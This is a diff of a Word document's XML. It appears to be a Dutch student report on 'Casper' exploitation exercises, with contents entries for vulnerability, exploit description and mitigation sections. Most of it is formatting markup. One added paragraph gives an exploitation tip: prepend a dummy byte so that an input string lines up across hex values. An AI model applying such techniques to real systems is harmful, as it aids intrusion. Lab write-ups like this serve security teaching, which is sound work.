+        </w:rPr>
+        <w:t>, zie naar de onderlijnde bytes</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Het eerste probleem hierbij is dat deze string is opgedeeld </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve">over 2 hexadecimale waarden. Maar dit is makkelijk om te lossen door voor deze string nog een </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>dummie</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> letter voor te voegen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>b</w:t>
+      </w:r>
+      <w:bookmarkStart w:id="13" w:name="_GoBack"/>
+      <w:bookmarkEnd w:id="13"/>
+      <w:r>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
+        </w:rPr>
+        <w:t>ijvoorbeeld “B”.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="both"/>
+        <w:rPr>
+          <w:lang w:val="nl-BE"/>
         </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Kop3"/>
+        <w:jc w:val="both"/>
         <w:rPr>
           <w:lang w:val="en-GB"/>
         </w:rPr>
@@ -4831,6 +6626,92 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="1" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="22025D60"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="FDF400FE"/>
+    <w:lvl w:ilvl="0" w:tplc="1000000F">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="10000019">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1440" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="1000001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2160" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="1000000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="2880" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="10000019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3600" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="1000001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4320" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="1000000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5040" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="10000019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5760" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="1000001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6480" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="24F73E60"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="2C2AB914"/>
@@ -4919,7 +6800,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="36535F5A"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="85327454"/>
@@ -5032,7 +6913,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4DCE257F"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="4EA6A670"/>
@@ -5145,7 +7026,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="547B4634"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="1000001F"/>
@@ -5231,7 +7112,7 @@
       </w:pPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="776F3E43"/>
     <w:multiLevelType w:val="hybridMultilevel"/>
     <w:tmpl w:val="BDB6864C"/>
@@ -5348,19 +7229,22 @@
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="2">
-    <w:abstractNumId w:val="1"/>
+    <w:abstractNumId w:val="2"/>
   </w:num>
   <w:num w:numId="3">
+    <w:abstractNumId w:val="5"/>
+  </w:num>
+  <w:num w:numId="4">
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="5">
+    <w:abstractNumId w:val="3"/>
+  </w:num>
+  <w:num w:numId="6">
     <w:abstractNumId w:val="4"/>
   </w:num>
-  <w:num w:numId="4">
-    <w:abstractNumId w:val="5"/>
-  </w:num>
-  <w:num w:numId="5">
-    <w:abstractNumId w:val="2"/>
-  </w:num>
-  <w:num w:numId="6">
-    <w:abstractNumId w:val="3"/>
+  <w:num w:numId="7">
+    <w:abstractNumId w:val="1"/>
   </w:num>
 </w:numbering>
 </file>
@@ -6431,6 +8315,8 @@
   <w:rsids>
     <w:rsidRoot w:val="007B5ECD"/>
     <w:rsid w:val="00183736"/>
+    <w:rsid w:val="00335F65"/>
+    <w:rsid w:val="003F63A5"/>
     <w:rsid w:val="007B5ECD"/>
     <w:rsid w:val="00CA0CD2"/>
     <w:rsid w:val="00DE32B4"/>
@@ -7230,7 +9116,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{F8F1E0FD-A178-4604-AFE4-F60DB66F49AB}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{3D233A9C-35BD-426D-B271-C50264A2DDE3}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/verslag/verslag_dev_Sec.docx
+++ b/verslag/verslag_dev_Sec.docx
@@ -384,6 +384,7 @@
             <w:rPr>
               <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang/>
             </w:rPr>
           </w:pPr>
           <w:r>
@@ -395,7 +396,7 @@
           <w:r>
             <w:fldChar w:fldCharType="separate"/>
           </w:r>
-          <w:hyperlink w:anchor="_Toc25519919" w:history="1">
+          <w:hyperlink w:anchor="_Toc26704201" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -423,7 +424,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc25519919 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704201 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -463,9 +464,10 @@
             <w:rPr>
               <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc25519920" w:history="1">
+          <w:hyperlink w:anchor="_Toc26704202" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -492,7 +494,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc25519920 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704202 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -530,10 +532,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc25519921" w:history="1">
+          <w:hyperlink w:anchor="_Toc26704203" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -561,7 +565,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc25519921 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704203 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -599,10 +603,12 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc25519922" w:history="1">
+          <w:hyperlink w:anchor="_Toc26704204" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -630,7 +636,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc25519922 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704204 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -668,15 +674,17 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc25519923" w:history="1">
+          <w:hyperlink w:anchor="_Toc26704205" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
-                <w:lang w:val="en-GB"/>
+                <w:lang w:val="nl-BE"/>
               </w:rPr>
               <w:t>Exploit beschrijving</w:t>
             </w:r>
@@ -699,7 +707,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc25519923 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704205 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -737,15 +745,17 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc25519924" w:history="1">
+          <w:hyperlink w:anchor="_Toc26704206" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
-                <w:lang w:val="en-GB"/>
+                <w:lang w:val="nl-BE"/>
               </w:rPr>
               <w:t>Mitigation</w:t>
             </w:r>
@@ -768,7 +778,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc25519924 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704206 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -788,7 +798,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -806,15 +816,17 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc25519925" w:history="1">
+          <w:hyperlink w:anchor="_Toc26704207" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
-                <w:lang w:val="en-GB"/>
+                <w:lang w:val="nl-BE"/>
               </w:rPr>
               <w:t>Advanced level: Casper41</w:t>
             </w:r>
@@ -837,7 +849,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc25519925 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704207 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -857,7 +869,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>3</w:t>
+              <w:t>4</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -877,9 +889,10 @@
             <w:rPr>
               <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc25519926" w:history="1">
+          <w:hyperlink w:anchor="_Toc26704208" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -891,7 +904,7 @@
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
-                <w:lang w:val="en-GB"/>
+                <w:lang w:val="nl-BE"/>
               </w:rPr>
               <w:t>6</w:t>
             </w:r>
@@ -914,7 +927,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc25519926 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704208 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -934,7 +947,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -952,15 +965,17 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc25519927" w:history="1">
+          <w:hyperlink w:anchor="_Toc26704209" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
-                <w:lang w:val="en-GB"/>
+                <w:lang w:val="nl-BE"/>
               </w:rPr>
               <w:t>Omschrijving</w:t>
             </w:r>
@@ -983,7 +998,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc25519927 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704209 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1003,7 +1018,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1021,15 +1036,17 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc25519928" w:history="1">
+          <w:hyperlink w:anchor="_Toc26704210" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
-                <w:lang w:val="en-GB"/>
+                <w:lang w:val="nl-BE"/>
               </w:rPr>
               <w:t>Vulnerability</w:t>
             </w:r>
@@ -1052,7 +1069,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc25519928 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704210 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1072,7 +1089,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1090,15 +1107,17 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc25519929" w:history="1">
+          <w:hyperlink w:anchor="_Toc26704211" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
-                <w:lang w:val="en-GB"/>
+                <w:lang w:val="nl-BE"/>
               </w:rPr>
               <w:t>Exploit beschrijving</w:t>
             </w:r>
@@ -1121,7 +1140,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc25519929 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704211 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1141,7 +1160,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1159,15 +1178,17 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc25519930" w:history="1">
+          <w:hyperlink w:anchor="_Toc26704212" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
-                <w:lang w:val="en-GB"/>
+                <w:lang w:val="nl-BE"/>
               </w:rPr>
               <w:t>Mitigation</w:t>
             </w:r>
@@ -1190,7 +1211,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc25519930 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704212 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1210,7 +1231,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>5</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1228,17 +1249,239 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
             </w:tabs>
             <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
               <w:noProof/>
+              <w:lang/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc25519931" w:history="1">
+          <w:hyperlink w:anchor="_Toc26704213" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
                 <w:noProof/>
+                <w:lang w:val="nl-BE"/>
+              </w:rPr>
+              <w:t>Advanced level: Casper61</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704213 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>6</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc26704214" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>Casper</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="nl-BE"/>
+              </w:rPr>
+              <w:t>8</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704214 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc26704215" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="nl-BE"/>
+              </w:rPr>
+              <w:t>Omschrijving</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704215 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc26704216" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
                 <w:lang w:val="en-GB"/>
               </w:rPr>
-              <w:t>Advanced level: Casper61</w:t>
+              <w:t>Vulnerability</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1259,7 +1502,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc25519931 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704216 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1279,7 +1522,582 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:t>4</w:t>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9016"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
+              <w:noProof/>
+              <w:lang/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc26704217" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:noProof/>
+                <w:lang w:val="nl-BE"/>
+              </w:rPr>
+              <w:t>Exploit beschrijving</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc26704217 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:t>7</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="Inhopg3"/>
+            <w:tabs>
